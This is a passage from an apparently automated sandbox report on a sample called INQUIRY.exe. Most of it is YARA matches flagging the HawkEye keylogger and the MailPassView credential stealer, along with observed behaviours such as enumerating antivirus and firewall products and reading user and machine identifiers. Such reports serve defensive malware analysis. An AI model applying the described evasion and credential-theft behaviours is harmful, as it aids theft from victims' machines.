                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040697A GetSystemTime,0_2_0040697A
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040697A GetSystemTime,0_2_0040697A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,5_2_0040724C
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,5_2_0040724C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00441B28 GetVersion,0_2_00441B28
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00441B28 GetVersion,0_2_00441B28
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: INQUIRY.exe, 00000011.00000002.835872619.000000000019D000.00000004.00000010.sdmpBinary or memory string: avp.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmpBinary or memory string: r\MsMpeng.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: INQUIRY.exe, 00000011.00000002.835872619.000000000019D000.00000004.00000010.sdmpBinary or memory string: avp.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmpBinary or memory string: r\MsMpeng.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Yara detected MailPassViewShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.888584585.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5684, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
